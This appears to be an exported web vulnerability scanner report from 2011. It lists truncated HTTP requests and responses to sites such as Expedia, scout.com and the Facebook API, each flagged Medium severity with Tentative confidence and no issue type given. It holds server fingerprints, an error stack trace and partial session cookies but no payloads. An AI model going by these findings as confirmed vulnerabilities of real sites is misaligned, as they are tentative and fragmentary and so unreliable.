POST /login.php HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow Cache-Control: max-age=0 Origin: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 Content-Length: 31 tEmail=Email&pPassword |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:37:53 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=71434cdaab Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 4494 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'= <input type="submit" value="Login" class="button" /> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://api.facebook.com |
Path: | /restserver.php |
GET /restserver.php?v=1.0 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://allatsea.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: campaign_click_url= |
HTTP/1.1 200 OK Cache-Control: public, max-age=120 Content-Type: text/javascript;charset Expires: Fri, 06 May 2011 14:11:47 -0700 Pragma: X-FB-Rev: 374976 X-FB-Server: 10.32.75.116 X-Cnection: close Date: Fri, 06 May 2011 21:09:47 GMT Content-Length: 910 fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://cdn-cms.scout.com |
Path: | /feeds/analyticsfeed.ashx |
GET /feeds/analyticsfeed.ashx Host: cdn-cms.scout.com Proxy-Connection: keep-alive Referer: http://www.scout.com/2/a User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Server: Scoutweb10 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Akamai: True Date: Fri, 06 May 2011 19:29:14 GMT Connection: close Akamai: True Content-Length: 364 <analyticsfeed xmlns:i="http://www.w3 ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://cdn-forums.scout |
Path: | /adfeed.ashx |
GET /adfeed.ashx?s=143&format Host: cdn-forums.scout.com Proxy-Connection: keep-alive Referer: http://www.scout.com/2/a User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Server: MBRD25 X-AspNet-Version: 2.0.50727 X-Website-Assembly Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Fri, 06 May 2011 19:29:15 GMT Connection: close Akamai: True Content-Length: 456 <adFeed xmlns:i="http://www.w3 ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hmficweb |
Path: | /abouthingham/Default |
GET /abouthingham/Default Referer: http://hmficweb User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hmficweb.hinghammutual Cookie: ASPSESSIONIDSQCDDDAA Accept-Encoding: gzip, deflate |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 17:39:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6963 <html> <head> <title>Could not find file 'C:\Inetpub\wwwroot <style> body {font-family:"Verdana" ...[SNIP]... SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy) +1162 System.IO.FileStream. System.Xml.XmlDownloadManager System.Xml.XmlUrlResolver System.Xml.XmlTextRe ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://img.widgets.video |
Path: | /resource.aspx |
GET /resource.aspx?resources Host: img.widgets.video.s-msn Proxy-Connection: keep-alive Referer: http://www.scout.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: public, max-age=1800 Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Age: 2 Date: Fri, 06 May 2011 19:33:36 GMT Last-Modified: Fri, 06 May 2011 19:33:35 GMT Expires: Fri, 06 May 2011 20:03:34 GMT Connection: keep-alive Content-Length: 10642 ...<?xml version="1.0" encoding="utf-8"?><xml> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.expedia.com |
Path: | /daily/common/moreinfo |
POST /daily/common/moreinfo Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 Origin: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 1023 BundleType=1&WT=Home ...[SNIP]... gTLA=&LsFlightOrigName= |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Cteonnt-Length: 34651 Content-Type: text/html; Charset=iso-8859-1 Cache-Control: private Date: Fri, 06 May 2011 23:21:15 GMT Connection: close Vary: Accept-Encoding Content-Length: 34651 <html> <head> <title>Expedia.com</title <link rel="stylesheet" type="text/css" href="/daily/styles/main <style> .pageHeading {font-size:20px;font ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.expedia.com |
Path: | /pub/agent.dll |
GET /pub/agent.dll?qscr=cach Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:36:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71697 <META HTTP-EQUIV="Content-Type" content="text/html; cha ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:54:23 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX01C Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:55:29 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX01C Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:54:03 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX019 Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:54:57 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX014 Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:54:29 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX013 Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:54:49 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX010 Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
GET /pub/agent.dll?qscr=cach Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:46:27 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: s1=`0`user=v.8,0 Content-Length: 71708 <META HTTP-EQUIV="Content-Type" content="text/html; cha ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:55:21 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX01F Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:53:40 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX011 Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:55:06 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX01A Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:55:35 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX017 Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:55:40 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX014 Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:55:46 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX019 Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:54:41 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX01C Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
POST /pub/agent.dll HTTP/1.1 Host: www.expedia.com Connection: keep-alive Referer: https://www.expedia.com Cache-Control: max-age=0 Origin: https://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 153 tccb=1&ussl=1&qscr=logi |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:55:14 GMT Connection: keep-alive Connection: Transfer-Encoding Set-Cookie: jscript=1; Domain=.expedia.com; path=/ Set-Cookie: s1=`user=v.8,0,EX01A Set-Cookie: p1=`accttype=v.2,3,1 Content-Length: 97905 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.scmagazineus |
Path: | /webservice/ImageResizer |
GET /webservice/ImageResizer Host: www.scmagazineus.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_pers=%20s_chn_cvp%3D |
HTTP/1.1 200 OK Cache-Control: private Content-Type: image/Jpeg Expires: Fri, 06 May 2011 22:51:48 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 From: Web2-VM Date: Fri, 06 May 2011 21:51:48 GMT Content-Length: 41087 ......JFIF............. ...[SNIP]... <?xml version="1.0" encoding="UTF-8"?> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
